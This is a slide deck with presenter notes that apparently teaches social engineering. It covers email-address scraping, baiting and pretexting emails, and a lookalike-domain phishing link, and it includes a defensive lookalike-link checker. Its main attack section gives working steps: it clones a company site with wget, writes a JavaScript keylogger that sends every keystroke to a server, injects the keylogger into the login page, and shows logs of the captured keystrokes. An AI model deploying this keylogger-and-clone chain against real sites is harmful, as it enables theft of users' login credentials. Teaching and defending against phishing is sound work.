Social Engineering

Presenter Notes

Overview

What is social engineering? How can it be used?

Types of social engineering

- Phishing attacks
- Baiting
- Tailgating
- Pretexting

Scraping emails

Scraping Facebook

Scraping content

Snippet below

for line in rawNames:
    if nameNext:
        email = "{0}{1}{2}".format(line.split()[0][0],
                                   line.split()[1], "@company.com")
        emails.append(email)
    if len(line.split()) == 0:
        nameNext = True
    else:
        nameNext = False

Baiting

from:   Dylan Ayrey <[email protected]>
to:  <[email protected]>, <[email protected]>, <[email protected]> ...

    Would any other intern be interested in a Kayak trip? There's a place 
    downtown that'll take us for $50 a head if we can get 10 people

(Still the attacker)

from:   David Someson <[email protected]>
to:      <[email protected]>, <[email protected]>, <[email protected]> ...

    Yeah! That sounds like a lot of fun!

from:   Dylan Ayrey <[email protected]>
to:      <[email protected]>, <[email protected]>, <[email protected]> ...

    Okay cool! I set up a PayPal account at this email ([email protected]), 
    once we get 10 people we can go!

from:   Chris Hanson <[email protected]>
to:      <[email protected]>, <[email protected]>, <[email protected]> ...

    Nice! I just sent the money. Can't wait.

Tailgating

Pretexting

Complex back stories to trick people into performing actions

Scenario

from:   Chris Hanson <[email protected]>
to:      <[email protected]>, <[email protected]>, <[email protected]> ...

    We are migrating databases from a non-relational database to a 
    relational database. Please try logging in and let me know if you
    have any issues http://company.com

Hyperlink links to http://cmopany.com
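
A defender-side check for the scenario above, added here as an example and not part of the original slides: it flags mail links whose visible text shows a trusted domain while the href points elsewhere, and link hosts within a small edit distance of a trusted domain. The `TRUSTED` list, the function names and the sample body are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

TRUSTED = ("company.com",)  # assumption: the organisation's real domains
ANCHOR = re.compile(r'<a\s[^>]*?href=["\']([^"\']*)["\'][^>]*>(.*?)</a>', re.I | re.S)


def osa_distance(a, b):
    """Edit distance in which swapping two adjacent characters costs 1."""
    d = [[max(i, j) if 0 in (i, j) else 0 for j in range(len(b) + 1)]
         for i in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                          d[i - 1][j - 1] + (a[i - 1] != b[j - 1]))
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def host_of(text):
    """Lower-cased host of a URL or bare domain; '' when it cannot be parsed."""
    text = re.sub(r"<[^>]+>", "", text).strip()  # drop inline tags such as <b>
    try:
        return urlparse(text if "//" in text else "//" + text).hostname or ""
    except ValueError:
        return ""


def is_trusted(host):
    return any(host == t or host.endswith("." + t) for t in TRUSTED)


def audit_links(html_body, max_dist=2):
    """Return (href, reason) for each link that imitates a trusted domain."""
    findings = []
    for href, shown in ANCHOR.findall(html_body):
        target = host_of(href)
        if not target or is_trusted(target):
            continue
        if is_trusted(host_of(shown)):
            findings.append((href, "text/href mismatch"))
        for t in TRUSTED:
            tail = ".".join(target.split(".")[-t.count(".") - 1:])
            if osa_distance(tail, t) <= max_dist:
                findings.append((href, "lookalike of " + t))
    return findings


SAMPLE = '<a href="http://cmopany.com">http://company.com</a>'  # constructed mail body
```

`audit_links(SAMPLE)` reports the link twice: once for the text/href mismatch and once as a lookalike, since swapping two adjacent letters is a single edit.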

Cloning the target

wget -r -l 2 -k -p -E -U "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36" www.company.com
  • '-r': Recursive download. Grabs all references through the markup such as href and src. If the freshly downloaded file is also of type text/html, application/xhtml+xml, or text/css, it will be parsed and followed further.
  • '-l': Sets the limit on -r to only traverse l levels (in this case 2)
  • '-k': Converts absolute links to relative links to make them work locally
  • '-p': Grabs static files and images (not html) one level deeper than the -l limit
  • '-E': Appends extensions to the filenames such as '.html'
  • '-U': User agent string (to look like requests are from Google Chrome)

The keylogger

document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    new Image().src = 'http://localhost:8000/keypress?key=' + key;
}

Where to place?

Anywhere? Everywhere? Let's try the login page

<script type='text/javascript' src='keylogger.js'></script>

Place that somewhere in the DOM of the login page, and make sure the keylogger.js file is in the accounts directory.

Run the server

In the www.company.com directory, run:

python -m SimpleHTTPServer

Visit localhost:8000 and log in.

Results

127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=h HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=e HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:01] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:01] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:02] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:02] "GET /keypress?key=w HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=o HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=r HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=l HTTP/1.1" 404 -
127.0.0.1 - - [28/May/2015 13:32:03] code 404, message File not found
127.0.0.1 - - [28/May/2015 13:32:03] "GET /keypress?key=d HTTP/1.1" 404 -

Questions?
